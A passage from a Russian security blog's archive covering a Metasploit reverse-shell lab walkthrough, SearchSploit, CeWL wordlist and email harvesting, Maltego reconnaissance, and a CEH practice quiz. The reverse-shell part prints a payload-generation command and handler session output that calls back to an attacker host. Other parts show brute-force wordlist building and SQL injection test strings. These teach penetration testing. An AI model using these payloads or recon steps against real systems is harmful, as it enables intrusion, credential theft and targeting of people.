Архив метки: Аудит ИБ

Как понять, что ваш VPS/VDS сервер взломан, и что с этим делать?

В этой статье давайте затронем тему, волнующую всех владельцев ресурсов, пользующихся VPS-хостингом – коснемся вопросов, связанных с безопасностью эксплуатации серверов, на которых они расположены. Читать

Как использовать reverse shell в Metasploit

Как использовать reverse shell в Metasploit

Существует два популярных типа shell, это соответственно bind и reverse. Bind shell – открывает новую службу на целевой машине и требует, чтобы атакующий подключился к ней для получения сеанса. Reverse shell – Обратный шелл наоборот предполагает, что атакующий сначала установил слушателя на своем компьютере, целевая машина выступает в роли клиента, подключающегося к этому слушателю, а затем, наконец, атакующий получает сеанс.

В этой статье рассмотрим  использование reverse shell для получения сеанса.

Список обратных оболочек Metasploit

Чтобы получить список обратных оболочек, используйте команду msfpayload.

./msfpayload -l |grep reverse

Как правило, свой выбор стоит остановить на Meterpreter, потому что в настоящее время он обеспечивает лучшую поддержку пост-эксплуатации, которую может предложить Metasploit. Например, railgun, пост-модули, различные команды meterpreter.

Reverse shell в Windows

В Windows наиболее часто используемым reverse shell является windows/meterpreter/reverse. Вы также можете использовать windows/meterpreter/reverse_http или windows/meterpreter/reverse_https, поскольку их сетевой трафик выглядит наименее аномальным.

Linux reverse shell

В Linux вы можете попробовать использовать  linux/x86/meterpreter/reverse_tcp, или 64-битную версию. Наиболее стабильным является linux/x86/shell_reverse_tcp.

Когда может потребоваться использовать reverse shell

Несколько возможных ниже приведенных сценариев предполагают использование указанного метода

  • Целевая машина находится в другой частной сети.
  • Межсетевой экран целевой машины блокирует входящие попытки подключения с помощью  bind shell.
  • Ваша полезная нагрузка (paylods) не может быть реализована к нужному порту по какой-либо причине.
  • Или же Вы просто не можете решить, что выбрать.

Когда reverse shell не нужен

Вообще говоря, если вы можете создать бэкдор в существующую службу, то обратная оболочка может и не понадобиться. Например, если на целевой машине уже работает SSH-сервер, то можно попробовать добавить на него нового пользователя и использовать учетные данные для дальнейших действий.

Как настроить reverse shell при генерации полезной нагрузки

Когда вы генерируете reverse shell помощью msfpayload или msfvenom, важно понимать, как настроить следующее:

  • LHOST – Это IP-адрес, к которому вы хотите подключить целевую машину. Если вы находитесь в локальной сети, вряд ли ваша целевая машина сможет связаться с вами, если только вы оба не находитесь в одной сети. В этом случае вам придется узнать свой публичный IP-адрес, а затем настроить свою сеть на переадресацию этого соединения на ваш компьютер. LHOST не должен быть “localhost”, или “0.0.0.0”, или “127.0.0.1”, потому что в этом случае вы говорите целевой машине подключиться к самой себе.
  • LPORT – порт, к которому вы хотите подключить целевую машину.

Когда вы настраиваете слушателя для reverse shell вам также, как минимум, необходимо сконфигурировать LHOST и LPORT, но немного в другом значении (другая перспектива):

  • LHOST – это IP-адрес, к которому вы хотите привязать ваш слушателя.
  • LPORT – это порт, к которому вы хотите привязать ваш слушатель.

Перед выполнением reverse shell следует убедиться, что слушатель запущен.

Демонстрация

В этой демонстрации у нас есть две машины:

Box A:

Ящик атакующего, который получает сессию полезной нагрузки.

IP это: 192.168.1.123 (ifconfig).

В той же сети, что и машина жертвы.

Box B:

Машина “жертвы”

Windows 7

IP-адрес: 192.168.1.80 (ipconfig)

В той же сети, что и машина злоумышленника

В целях тестирования антивирус не включен.

В целях тестирования также не включен брандмауэр.

Шаг 1: Создаем исполняемую полезную нагрузку

На компьютере атакующего запустим msfpayload или msfvenom:

$ ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 X > /tmp/iambad.exe

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

Length: 287

Options: {"LHOST"=>"192.168.1.123", "LPORT"=>"4444"}

 

Шаг 2: Скопируем исполняемую полезную нагрузку в Box B

Box B – это машина жертвы.

Шаг 3: Настроим обработчик полезной нагрузки на блоке Box A

Box A – это атакующая машина.

$ ./msfconsole -q

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.123

lhost => 192.168.1.123

msf exploit(handler) > set lport 4444

lport => 4444

msf exploit(handler) > run



[*] Started reverse handler on 192.168.1.123:4444

[*] Starting the payload handler...






Шаг 4: Дважды кликнем по вредоносному исполняемому файлу

Этот шаг не требует дополнительных объяснений.

 

Шаг 5: Просмотр сеанса meterpreter/payload на Box A

$ ./msfconsole -q

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.123

lhost => 192.168.1.123

msf exploit(handler) > set lport 4444

lport => 4444

msf exploit(handler) > run



[*] Started reverse handler on 192.168.1.123:4444

[*] Starting the payload handler...

[*] Sending stage (770048 bytes) to 192.168.1.80

[*] Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.80:1138) at 2014-10-22 19:03:43 -0500

meterpreter >

 

Подсказка meterpreter говорит нам о том, что в данный момент мы взаимодействуете с paylod’ом

¯_(ツ)_/¯ Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

 

 



2022-04-27T20:36:18
Аудит ИБ

Как искать эксплойты с помощью SearchSploit

Как искать эксплойты с помощью SearchSploit

Мы уже писали недавно о том как 📊 Как искать уязвимости CVE? | (itsecforu.ru) Теперь предлагаем рассмотреть Searchsploit более детельно.

Searchsploit это инструмент поиска в командной строке, в который включен Репозиторий Exploit Database. Инструмент позволяет вам всегда иметь под рукой Exploit Database, куда вы мы ни отправлялись. SearchSploit дает вам возможность выполнять детальный поиск в автономном режиме в вашей локальной проверенной копии репозитория. Эта возможность особенно полезна для задач аудита информационной безопасности в изолированных сетях без доступа в Интернет.

The Exploit Database – это архив публичных эксплойтов и соответствующего уязвимого программного обеспечения, разработанный для использования тестировщиками на проникновение и исследователями уязвимостей

Многие эксплойты содержат ссылки на бинарные файлы, которые не включены в стандартный репозиторий, но могут быть найдены в репозитории Exploit Database Binary Exploits. Если вы предполагаете, что во время оценки у вас не будет доступа в Интернет, проверьте оба репозитория, чтобы получить наиболее полный набор данных.

Как установить SearchSploit на Linux

Если вы используете стандартную GNOME-сборку Kali Linux, пакет exploitdb уже включен по умолчанию! Однако если вы используете вариант Kali Light или свой собственный ISO, вы можете установить пакет вручную следующим образом:

sudo apt update && sudo apt -y install exploitdb

Вы можете установить и другие связанные пакеты: exploitdb-papers и exploitdb-bin-sploits.

Если вы не используете Kali Linux, пакет exploitdb может быть недоступен через менеджер пакетов, в этом случае вы можете установитьSearchSploit, следуя инструкциям на вкладке ‘Git’.

Обновление SearchSploit

Если вы используете Kali Linux, вы можете быть уверены, что пакет exploitdb будет обновляться еженедельно. Если вы используете Homebrew или Git, вы можете получать ежедневные обновления (в 05:05 UTC).

Независимо от того, как вы установили SearchSploit, все, что вам нужно сделать для его обновления, это выполнить следующую команду:

searchsploit -u




Если вы используете пакет Kali Linux и не обновлялись с 20 сентября 2016 года (такое бывает?), сначала вам нужно обновить пакет традиционным способом:

sudo apt update && sudo apt -y full-upgrade

Обратите внимание, мы не рекомендуем вам использовать для обновления пакеты .zip с GitHub или устаревшие пакеты archive.tar.bz2.

Как пользоваться SearchSploit

Используя команду -h, вы можете увидеть все доступные вам функции и опции:

 searchsploit -h


 

 

Базовый поиск

Просто задайте любое количество поисковых терминов, которые вы хотите найти:

 

 

 

Обратите внимание на то, что SearchSploit использует оператор AND, а не оператор OR. Чем больше терминов используется, тем больше результатов будет отобрано.

Совет а: Не используйте аббревиатуры (используйте SQL Injection, а не SQLi).

Совет: Если вы не получаете ожидаемых результатов, попробуйте поискать более широко, используя более общие термины (используйте Kernel 2.6 или Kernel 2.x, а не Kernel 2.6.25).

Поиск по названию

По умолчанию searchsploit проверяет оба заданных наименований на наличие эксплойтов и по пути к файлам. В зависимости от критериев поиска, это может привести к ложным срабатываниям (особенно при поиске терминов, соответствующих платформам и номерам версий). В таком случае поиск оптимизировать, выполняя поиск только по названиям используя параметр -t:

 

Если бы мы не использовали опцию -t, то мы бы получили 94 (6 строк находятся в заголовке/под колонтитулом) результата, а не 9.

Исключение нежелательных результатов

Мы можем удалить нежелательные результаты с помощью опции –exclude. Мы также можем исключить сразу несколько терминов, разделяя значения символом | (pipe). Это можно продемонстрировать следующим образом:

 

Таким образом, мы сокращаем результаты до 30 с возможных 41 (6 строк приходится на заголовок/ колонтитул)!

Возможно, вы также заметили, что “3.2” не всегда отображается в результатах. Это потому, что SearchSploit по умолчанию пытается определить версию, а затем ищет между любыми значения в заголовках. Это поведение можно отключить, используя флаг -s.

Совет: Выполнив команду: searchsploit linux kernel –exclude=”(PoC)|/dos/” | grep ‘ 3.2’ (пробел перед версией), вы получите еще более “чистый” результат (отсортированный по версии без заголовков).

Передача результатов (альтернативный метод удаления нежелательных результатов)

Вывод searchsploit можно направить в любую другую программу, что особенно полезно при выводе результатов в формате JSON (с помощью опции -j). С ее помощью можно удалить все нежелательные эксплойты с помощью grep. В следующем примере мы используем grep, чтобы отфильтровать все результаты “Denial of Service (DoS)”.

 

 

Передав результаты поиска в grep, мы смогли отфильтровать результаты до 5, вместо 17 (6 строк находятся в заголовке/сноске)!

Совет: Мы рекомендуем использовать “/dos/” в grep, а не “dos”, чтобы фильтр применялся к пути, а не к заголовку. Хотя записи об отказе в обслуживании могут не содержать “dos” в названии, они все равно будут содержать “dos” в пути. Удаление результатов на основе пути также гарантирует, что вы случайно не отфильтруете результаты, которые действительно содержат “dos” в названии (например: EDB-ID #24623).

Цветной вывод

По умолчанию searchsploit выделяет поисковые термины в результатах, когда они отображаются пользователю. Это происходит путем вставки невидимых символов в вывод до и после изменения цвета.

Теперь, если вы передадите результаты (например, в grep) и попытаетесь подобрать фразу из выделенного и не выделенного текста в результатах, это не увенчается успехом. Эту проблему можно решить с помощью опции –colour (опция –color также работает)

 

 

Копирование в буфер обмена

Итак, теперь, когда мы нашли искомый эксплойт, существуют различные способы быстрого доступа к нему.

Используя -p, мы можем получить дополнительную информацию об эксплойте, а также скопировать полный путь к нему в буфер обмена:

 

Скопировать в папку

Мы рекомендуем не модифицировать эксплойты в локальной копии базы данных. Вместо этого сделайте копию тех, которые представляют интерес, и используйте их из рабочего каталога. Используя опцию -m, мы можем выбрать любое количество эксплойтов, которые будут скопированы в ту же папку, в которой мы сейчас находимся:

 

Exploit-DB Online

Репозиторий Exploit Database является основным ядром Exploit-DB, что делает SearchSploit эффективным и простым в использовании. Однако некоторые метаданные эксплойтов (такие как скриншоты, установочные файлы, теги и сопоставления уязвимостей) не включены. Чтобы получить к ним доступ, вам придется обратиться к веб-сайту.

Вы можете быстро сгенерировать ссылки на интересующие вас эксплойты, используя опцию -w:

 

 

¯_(ツ)_/¯ Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.



2022-01-12T21:24:15
Аудит ИБ

📒 Как создать список слов из содержимого Веб-сайта

Как создать словарь из содержимого сайта

Мы уже писали о создании словарей паролей в статьях

Однако сегодня рассмотрим метод, где источником слов будет является Веб-сайт потенциальной жертвы, и для этого мы будем использовать Cewl

Cewl – это предустановленный инструмент в kali Linux, который предназначен для создания списка слов, используя любые URL, например (сайты организаций, персональные страницы и т.д.). В дальнейшем сформированный список слов можно использовать для взлома паролей с помощью john the ripper или для проведения атак методом brute-force. В этом инструменте существует множество опций, поэтому мы расскажем вам о некоторых командах, которые мы чаще всего используем. Указанный инструмент может быть полезен при проведении тестирования на проникновение, так как всегда лучше использовать словари слов, подготовленные под таргетированную цель.

ПАРАМЕТРЫ СПРАВКИ CEWL

Используйте команду cewl -h.

Эта команда покажет все опции подсказок в cewl

 

ГЕНЕРАЦИЯ СПИСКА СЛОВ

Далее мы воспользуемся этой командой для создания списка слов, используя URL любого сайта

cewl https://itsecforu.ru






СОХРАНЕНИЕ СПИСКА СЛОВ В ФАЙЛ

Далее мы используем команду

cewl https://itsecforu.ru -w wordlist.txt




 

Эта команда сохранит сгенерированный нами список слов. Флаг -w используется для записи результата в файл

Далее используем команду cat wordlist.txt. Чтобы просмотреть содержимое файла

cat wordlist.txt

 

 

ГЕНЕРАЦИЯ СПИСКА СЛОВ ОПРЕДЕЛЕННОЙ ДЛИНЫ

Далее используем команду

cewl https://itisgood.ru -m 10

Эта команда покажет нам слова минимальной длины из 10 символов с указанного сайта

Флаг -m используется для определения минимальной длины слова

 

ПОЛУЧЕНИЕ ЭЛЕКТРОННОЙ ПОЧТЫ С ВЕБ-САЙТА

Далее используем команду

cewl https://www.cmrtc.ac.in -n -e.

Вывод этой команды покажет нам общее количество адресов электронной почты, найденных на сайте. Эта информация может быть использована для атак методами социальной инженерии.

Флаг -n используется для запрета вывода списка слов.

Флаг -e используется для включения адреса электронной почты

 

 

КОЛИЧЕСТВО СЛОВ, ПОВТОРЯЮЩИХСЯ НА ВЕБ-САЙТЕ

Далее используем команду

cewl https://itsecforu.ru -c

Эта команда отображает количество повторений слов на сайте

Флаг -c используется для отображения количества для каждого найденного слова

 

DEBUG ИНФОРМАЦИЯ

Далее используем команду

cewl http://testphp.vulnweb.com --debug

Эта команда покажет ошибки и необработанные данные сайта.

Флаг -debug используется для получения дополнительной отладочной информации.

 

РЕЖИМ VERBOSE

Далее используем команду

cewl http://testphp.vulnweb.com -v

Эта команда покажет полную информацию о сайте.

Флаг -v используется для просмотра подробной информации

 

ГЕНЕРАТОР АЛФАВИТНО-ЦИФРОВЫХ СИМВОЛОВ

Далее используем команду

cewl https://sitename.ru --with-numbers

Эта команда покажет список слов, помимо содержащих символы алфавита, состоящие из цифр

-with-numbers флаг для отображения слов, содержащих цифры, а также простые буквы

 

¯_(ツ)_/¯ Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.



2022-01-07T18:01:31
Аудит ИБ

🕵️‍♂️ Знакомимся с Maltego

Что такое Maltego ?

Maltego – один из самых известных OSINT-фреймворков для персональной и корпоративной разведки. Это инструмент с графическим интерфейсом, который обеспечивает возможность сбора информации о любых лицах путем извлечения информации, общедоступной в Интернете, различными методами. Maltego также способен составлять списки DNS и собирать данные из социальных сетей в легко читаемом формате.

Как мы собираемся использовать Maltego в нашем тестировании на проникновение или в тренировке “red team”? Мы можем использовать этот инструмент для  визуализации собранных нами данных. Community-версия Maltego идет в коробке с Kali Linux.

Как пользоваться Maltego

Задачи в Maltego называются transforms. Transforms встроены в инструмент и определяются как сценарии кода, которые выполняют определенные задачи. В Maltego также имеется множество плагинов, таких как набор инструментов SensePost, Shodan, VirusTotal, ThreatMiner и так далее. Maltego предлагает пользователю исчерпывающую информацию.

“Информация – это рычаг. Информация – это сила. Информация – это Maltego.”

Что делает Maltego?

Maltego – это программа, которая может быть использована для определения отношений и реальных связей между:

  • Людьми
  • Группами людей (социальные сети)
  • Компаниями
  • Организациями
  • Веб-сайтами
  • Инфраструктура Интернета, такая как:
  • Домены
  • DNS-имена
  • Поддержка сущностей NetBlocks
  • IP-адреса
  • Фразы
  • Аффилиации
  • Документы и файлы
  • Cущности связаные между собой с помощью открытых источников.

Maltego легко и быстро установить – он использует Java, поэтому работает на Windows, Mac и Linux. Maltego предоставляет вам графический интерфейс, который делает просмотр этих связей мгновенным и точным, позволяет также увидеть скрытые связи.

Используя графический интерфейс пользователя (GUI), вы можете легко увидеть взаимосвязи – даже если они находятся на расстоянии трех или четырех степеней разделения.

Maltego уникален тем, что использует мощную, гибкую структуру, которая формируется благодаря настройкам, поэтому, Maltego может быть адаптирован к вашим собственным, уникальным требованиям.

Чем Maltego может быть полезным для нас?

Maltego можно использовать на этапе сбора информации во всех работах, связанных с безопасностью. Это сэкономит наше время и позволит вам работать более точно и умно.

Maltego помогает нам в вашем мыслительном процессе, наглядно демонстрируя взаимосвязи между искомыми элементами.

Maltego предоставляет нам гораздо более мощный поиск, обеспечивая более разумные результаты.

Если доступ к “скрытой” информации определяет ваш успех, Maltego поможет нам обнаружить ее.

Настройка Maltego в Kali Linux

Самый простой способ получить доступ к этому приложению – ввести maltego в Терминале, также мы можем открыть его из меню приложений Kali Linux.

maltego

После того, как мы впервые открыли Maltego, он покажет нам страницу выбора продукта, где мы можем купить различные версии Maltego, но Community версия Maltego бесплатн и поэтому мы выбираем ее (Maltego CE) и нажимаем на кнопку запуска, как показано на следующем снимке экрана:

 

После нажатия на кнопку “RUN” мы получим окно настройки Maltego. Здесь нам нужно войти в систему и настроить Maltego в первый раз. Сначала нам нужно принять условия и положения Maltego, как показано на следующем снимке экрана:

 

 

На скриншоте выше видно, что мы установили флажок ✅ в поле “Accept” и нажали на кнопку “Next”.

Теперь необходимо зарегистрироваться для создания учетных данных (если ее нет). Нам нужно нажать на “Register”, и страница регистрации откроется в нашем браузере. Вводим учетные данные, подтверждаем регистрацию на почте и логинимся.

Затем нам нужно просто нажать “Далее”, “Далее”, “Далее”, “Далее”, и перед нами откроется Maltego, как мы видим на следующем снимке экрана.

 

 

Запуск Maltego на Kali Linux

Теперь мы готовы использовать Maltego и запустить машину, перейдя к “Machines” в папке Menu и нажав на “Run Machine”; после чего мы сможем запустить экземпляр движка Maltego. Это показано на следующем снимке экрана:

 

 

Обычно, когда мы выбираем Maltego Public Servers, у нас есть следующие варианты выбора Machine:

  • Company Stalker: чтобы получить все адреса электронной почты в домене и затем посмотреть, какие из них резолвятся в социальных сетях. Он также загружает и извлекает метаданные опубликованных в Интернете документов.
  • Find Wikipedia edits: Это функция ищет псевдоним из Википедии и ищет его во всех платформах социальных сетей.
  • Footprint L1: определяет базовые отпечатки домена.
  • Footprint L2: определяет отпечатки среднего уровня домена .
  • Footprint L3: интенсивное глубокое погружение в домен, обычно используется с осторожностью, поскольку съедает все ресурсы.
  • Footprint XXL: Работает с крупными целями, такими как компания, имеющая собственные центры обработки данных, и пытается получить отпечатоки, просматривая записи sender policy framework (SPF) в надежде на netblocks, а также обратные делегированные DNS к их серверам имен.
  • Person – Email Address:: Получить чей-то адрес электронной почты и посмотреть, где он используется в Интернете. Вводится не домен, а полный адрес электронной почты.

    URL – Сеть и доменная информация: Это преобразование позволяет определить доменную информацию других ДВУ. Например, если мы предоставим www.yandex.ru, оно определит www.yandex.com, yandex.kz, и так далее и тому подобное.

Эксперты по кибербезопасности обычно начинают с “Footprint L1”, чтобы получить базовое представление о домене и его потенциально доступных субдоменах и соответствующих IP-адресах. В рамках сбора информации неплохо начать с этой информации, однако пентестеры могут использовать и все остальные Machine, как упоминалось ранее, для достижения своей цели. После выбора Machine нужно нажать кнопку “Next” и указать домен, например yandex.ru. На следующем скриншоте представлен обзор yandex.ru

 

 

В верхней левой части скриншота выше мы увидим окно Palette . В окне Palette мы можем выбрать тип сущности, для которой вы хотите собрать информацию. Maltego делит сущности на шесть групп следующим образом:

  • Devices Устройства, такие как телефон или камера.
  • Infrastructure  Инфраструктура, такая как AS, DNS-имя, домен, IPv4-адрес, MX-запись, NS-запись, netblock, URL и веб-сайт.
  • Locations Местоположение на Земле.
  • Penetration Тестирование на проникновение
  • Personal Личные данные, такие как псевдоним, документ, адрес электронной почты, изображение, человек, номер телефона и фраза.
  • Social Network  Социальные сети, такие как объект Facebook, объект Twitter, принадлежность к Facebook и принадлежность к Twitter.

Если мы щелкнем правой кнопкой мыши на имени домена, мы увидим все возможные варианты преобразований, которые можно сделать с именем домена:

 

 

  • DNS домена.
  • Данные владельца домена.
  • Адреса электронной почты домена.
  • Файлы и документы из домена.
  • Другие преобразования, такие как To Person, To Phone numbers и To Website.
  • Все даныее (All transforms)

Если мы хотим поменять домен, необходимо сначала сохранить текущий график. Чтобы сохранить график, нажмите на значок Maltego, а затем выберите Сохранить. График будет сохранен в формате файла графиков Maltego ( .mtgl ). Опциаонально доступно также шифрование файла AES-128

 

 

 

Заключение

Вот как Maltego работает в нашей системе Kali Linux. Это очень мощный инструмент сбора информации с графическим интерфейсом, который поставляется вместе с Kali Linux.

¯_(ツ)_/¯ Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.



2021-10-29T14:47:51
Аудит ИБ

🕶️ Проверяем свои силы в тесте на CEH (Certified Ethical Hacker)

Введение

Экзамен Certified Ethical Hacker призван подтвердить, что обладатели его сертификата знают широкий круг вопросов, которые необходимы для того, чтобы быть эффективным этичным хакером. CEH – это сертификат, который подтверждает важность выявления проблем информационной безопасности и их дальнейшее устранение. Этичный хакинг является одним из методов, с помощью которого компании могут защитить себя от атак – до того, как это сделают злоумышленники. Простого сканирования с помощью автоматизированных инструментов недостаточно, поскольку, как бы хороши ни были сканеры выявления уязвимостей, нельзя забывать про ложные срабатывания – случаи, когда сканер указывает на проблему, которая на самом деле таковой не является. Сканеры являются хорошим отправным пунктом, но для того, чтобы найти дыры в сложных сетях и системах, как привило, потребуется креативный интеллект, которым обладают люди. Вот почему и потребность в этичных хакерах актуальна на сегодяшний день.

Более такого, экзамен CEH имеет двойное назначение. Он не только подтверждает глубокие технические знания, но и обязывает любого обладателя сертификата соблюдать профессиональный кодекс поведения. От вас ожидается не только знание технического содержания, но ожидается следованию этого кодекса поведения. Когда компании нанимают или заключают контракты с людьми, имеющими сертификат CEH сертификацию,и они должны быть уверены, что наняли человека, обладающего умением хранить их секреты и предоставлять им профессиональные услуги, чтобы помочь улучшить состояние их безопасности и обеспечить защиту важных ресурсов.

Попробуем проверить свои знания в тесте, содержащем небольшое количество вопросов. После каждого вопросы будет представлен правильный ответ с пояснением, давайте начинать.

1. Что из нижеперечисленного является пассивным разведывательным действием?

A. Поиск информации в местной газете

B. Звонок в отдел кадров

C. Использование команды nmap -sT

D. Проведение атаки типа “человек посередине”

Ответ A. Поиск информации в местной газете считается пассивным, поскольку он не оказывает прямого воздействия или установления какого-либо типа связи между жертвой и противником. Все другие ответы подразумевают прямое того или иного вида подключение к компании или ее сети.

2. Какое шифрование было выбрано NIST в качестве основного метода обеспечения конфиденциальности

после алгоритма DES?

A. 3DES

B. Twofish

C. RC4

D. AES

Ответ D. Был выбран шифр Rijndael, который затем получил название Advanced Encryption Standard (AES).

3. Какой облачный сервис вы, скорее всего, будете использовать, если захотите поделиться документами с

другим человеком?

A. Программное обеспечение как услуга (Software as a Service)

B. Платформа как услуга (Platform as a Service)

C. Хранение как услуга (Storage as a Service)

D. Инфраструктура как услуга (Infrastructure as a Service)

Ответ C. Хранение как услуга предлагает возможность хранения документов или других неструктурированных данных, которыми затем можно поделиться с другими. Программное обеспечение как услуга хранит данные в приложении, как правило, и не позволяет обмениваться документами. Платформа как услуга или инфраструктура как услуга можент использоваться, но они требуют дополнительной работы, чтобы обеспечить загрузку файлов и их совместного использования. Хранение как услуга была бы самым простым способом, и пожалуй, наиболее вероятным.

4. В чем разница между традиционным брандмауэром и IPS?

A. Брандмауэры не генерируют журналы.

B. IPS не может отбрасывать пакеты.

C. IPS не следует правилам.

D. IPS может проверять и отбрасывать пакеты.

Ответ D. IPS проверяет пакеты, чтобы сопоставить их с правилами, написанными для поиска вредоносного трафика.. И IPS, и брандмауэр обычно генерируют журналы. IPS действительно следует правилам и может отбрасывать пакеты, что отличает IPS от IDS.

5. В чем заключается одно из преимуществ IPv6 перед IPv4 с точки зрения безопасности?

A. IPv4 имеет меньшее адресное пространство.

B. IPv6 позволяет проверять подлинность заголовка.

C. IPv6 более гибко относится к расширениям.

D. IPv6 обычно представлен в шестнадцатеричном формате.

Ответ.B. Хотя и все ответы верные, единственный ответ, относящийся к безопасности, – это вариант B. IPv6 позволяет аутентифицировать заголовки. Это гарантирует, что пакеты не были подделаны.

6. Вы являетесь старшим менеджером в ИТ-отделе своей компании. Какой самый

экономически эффективный способ предотвращения атак социальной инженерии?

A. Установить HIDS.

B. Убедиться, что все исправления обновлены.

C. Отслеживать и контролировать всю активность электронной почты.

D. Провести тренинг по повышению осведомленности о безопасности.

Ответ D. Проведение ежегодного тренинга по повышению осведомленности с упором на социальную инженерию повысит осведомленность в области ИБ в организации. Тренинг может быть проведен отделом информационной безопасности и отделом информационных технологий. Обеспечение актуальности патчей – хорошая идея, но она не поможет предотвратить атаки социальной инженерии. IDS на базе хоста может обнаружить атаку социальной инженерии, но но не предотвратит ее. То же самое относится и к мониторингу активности электронной почты.

7. На каком этапе этичного взлома вы изменяете или удаляете информацию из журнала?

A. Сканирование

B. Получение доступа

C. Разведка

D. Сокрытие следов

Ответ D.Злоумышленник будет редактировать и/или удалять информацию из журналов во время фазы заметания следов, которая является последней фазой атаки. Разведка, а также сканирование и сбор данных являются ранними этапами процесса, за которыми следует получение доступа.

8. Атакующий выполняет следующие действия на целевой рабочей станции: nmap -sT

192.33.10.5. На каком этапе находится атакующий?

A. Заметание следов

B. Сбор данных о системе

C. Сканирование и сбор данных

D. Получение доступа

Ответ C. Атакующий использует функцию Nmap для проведения сканирования TCP-соединения на цели, что является частью фазы сканирования и сбора данных. Вы не будете использовать Nmap ни для заметания следов или получения доступа. Вы можете использовать Nmap для сбора данных, но вам, как правило, придется запускать сценарии для выполнения сбора данных, которые используется для получения дополнительной информации о сервисах, пользователях и других деталях о цели.

9. Какой алгоритм шифрования является симметричным потоковым шифром?

A. AES

B. ECC

C. RC4

D. PGP

Ответ C. В отличие от RC5 и RC6, RC4 является потоковым шифром – это единственный симметричный шифр, который использует потоки. PGP не является алгоритмом шифрования. AES – это блочный шифр. ECC – это подход к шифрованию, позволяющий повысить вычислительную сложность при создании ключа, но не сам алгоритм шифрования.

10. Что является наиболее важной частью проведения теста на проникновение?

A. Получение официального письменного соглашения

B. Документирование всех действий и мероприятий

C. Немедленное устранение серьезных угроз

D. Поддержание надлежащей связи с командой по обеспечению информационной безопасности

 

Ответ A. Получение официального письменного соглашения имеет решающее значение, поскольку оно устанавливает юридические границы того, что разрешено и не разрешено проводить. Оно защищает специалистов по пентесту ю от судебных исков, если они не выходят за рамки согласованного плана выполнения работы. Хотя все остальные ответы являются отличными практиками, они не являются самыми важными.

11. Вы являетесь CISO в крупной технологической компании. Вам поручено внедрить шифр для ваших новых мобильных устройств, которые будут представлены в 2022 году. Какой стандарт шифрования вы, скорее всего, выберете?

A. RC4

B. MD5

C. AES

D. Skipjack

Ответ C. AES остается лучшим алгоритмом шифрования. Он гибок в выборе размера ключа и экономичен с точки зрения требуемой вычислительной мощности. RC4 – плохой выбор, поскольку известно, что он уязвим для атак. MD5 – это алгоритм хэширования. Skipjack – более старый алгоритм шифрования и не лучший выбор в данном случае.

12. Какая цель SYN-сканирование?

A. Оно устанавливает полное TCP-соединение.

B. Устанавливает только “полуоткрытое” соединение.

C. Оно открывает ACK-соединение с целью.

D. Оно обнаруживает все закрытые порты на целевой системе.

Ответ. B. Сканирование SYN используется для обнаружения открытых портов, но не завершает полное трехстороннее рукопожатие. Это считается “полуоткрытым” соединением. Сканирование при подключении выполняет полное трехстороннее TCP

квитирование для установления соединения. Не существует такого понятия, как ACK-соединение. Многие типы сканирования портов могут обнаружить закрытые порты в системе.

13. В чем заключается основная уязвимость ARP-запроса?

A. Он посылает адресный запрос всем хостам в локальной сети.

B. Адрес возвращается с именем пользователя и паролем в открытом виде.

C. Запрос адреса может вызвать DoS.

D. Запрос адреса может быть подделан MAC-адресом атакующего.

Ответ D. ARP-запрос не аутентифицирует запрашиваемый узел; поэтому возможно, что злоумышленник может подделать адрес жертвы с помощью своего собственного MAC-адреса. ARP не

не содержит имя пользователя и пароль. Вы не будете использовать ARP-запрос в качестве части любого DoS. Рассылка сообщений всем хостам в сети предусмотрена в ARP.

 

14. Вы – CISO популярного социального сайта. Ваши инженеры сообщают вам, что они наблюдают многочисленные сбои аутентификации, но с несколькими именами пользователей, ни один из которых не повторяется.

Какой тип атаки вы наблюдаете?

A. Атака с перебором паролей (Brute force)

B. Атака сбоя аутентификации (Authentication failure attack)

C. Атака на отказ в обслуживании (DOS)

D. Атака с подстановкой учетных данных (Credential stuffing attack)

Ответ D. Атака методом перебора паролей – это когда одно и то же имя пользователя пытаются использовать с различными паролями. Здесь нет доказательств того, что какая-либо служба подвергается негативному воздействию, поэтому это

это не атака типа “отказ в обслуживании”. Это не атака на отказ в аутентификации. Это атака на подстановку учетных данных, когда злоумышленник использует известные комбинации имени пользователя и пароля.

5. Какова цель атаки “человек посередине”?

A. Получение доступа

B. Сохранение доступа

C. Перехват сеанса

D. Заметание следов

Ответ C. Атака “человек посередине” обычно используется для перехвата сетевого трафика. Она может использоваться для получения доступа к информации, которая может быть использована в последующих атаках. Хотя атака “человек посередине” может быть использована для получения доступа, это не всегда является причиной ее использования. Аналогично, используя атаку “человек посередине”, вы не сможете как сохранить доступ, так и для замести следы.

16. Какой метод эксплуатации может позволить противнику передавать произвольные SQL-запросы в URL?

A. SQL-инъекция

B. XSS

C. Spear phishing

D. Метод инъекции в Ruby on Rails

Ответ A. Использование SQL-запросов типа ‘ or 1=1 – это способ получить больше информации, чем должно быть предоставлено через приложение. Эта техника используется для проверки уязвимостей SQL-инъекций. Поскольку речь идет о SQL, ни один из других ответов не подходит.

17. Какое значение TTL установлено по умолчанию для ОС Microsoft Windows 10?

A. 64

B. 128

C. 255

D. 256

Ответ B. Значение TTL по умолчанию для большинства операционных систем Microsoft равно 128.

18. 18. Какое входное значение вы бы использовали для оценки и тестирования уязвимостей SQL-инъекций?

A. SQL test

B. admin and password

C. || or |!

D. 1=1′

Ответ D. Использование значения 1=1 в URL проверяет уязвимость SQL, которая позволяет злоумышленнику предположить, что веб-приложение может быть использовано для инъекции SQL. SQL test не является SQL-запросом. Запрос admin и password, скорее всего, не пройдет через программу на стороне сервиса. Значение || or |! не является правильным SQL и не даст ничего полезного.

 

19. В чем преимущество использования SSH для трафика командной строки?

A. SSH шифрует трафик и учетные данные.

B. Вы не можете видеть, что делает противник.

C. Данные передаются в открытом виде.

D. A и B.

